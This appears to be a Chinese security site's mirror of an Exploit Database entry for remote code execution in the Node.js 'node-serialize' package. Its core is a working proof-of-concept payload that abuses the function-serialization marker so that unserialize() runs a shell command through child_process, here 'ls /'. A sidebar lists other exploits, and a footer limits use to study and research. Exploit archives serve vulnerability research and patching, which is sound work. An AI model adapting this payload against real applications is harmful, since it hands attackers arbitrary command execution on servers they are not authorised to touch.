体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观察
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法/SHDB
    • Exploits
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Node.JS – ‘node-serialize’ Remote Code Execution

  • Exploit Database
  • 135 阅读
  • 作者: OpSecX
    日期: 2017-02-08
  • 类别:
    • remote
    平台:
    • linux
  • 来源:https://www.exploit-db.com/exploits/45265/
  • 1
    2
    3
    4
    var serialize = require('node-serialize');
    var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
    serialize.unserialize(payload);
     
上一篇: Fully Featured News CMS 1.0 – ‘id’ SQL Injection
下一篇: WordPress Plugin Insert PHP 3.3.1 – PHP Code Injection
  • last Exploits
  • Node.JS – ‘node-serialize’ Remote Code Execution的更多信息
  • Microsoft Windows Media Encoder 9 – ‘wmex.dll’ ActiveX Buffer Overflow (MS08-053) (Metasploit):
  • Adobe Flash Player – PCRE Regex (Metasploit):
  • Eureka Email Client 2.2q – ERR Remote Buffer Overflow (Metasploit) (2):
  • Eudora Qualcomm WorldMail 3.0 – IMAPd ‘LIST’ Remote Buffer Overflow (Metasploit):
  • LabF nfsAxe FTP Client 3.7 – Remote Buffer Overflow (DEP Bypass):
  • Microsoft Internet Explorer – CCaret Use-After-Free (MS13-069) (Metasploit):
  • Microsoft AntiXSS 3/4.0 Library Sanitization Module – Security Bypass:
  • Nuuo Central Management – (Authenticated) SQL Server SQL Injection (Metasploit):
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证: 体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏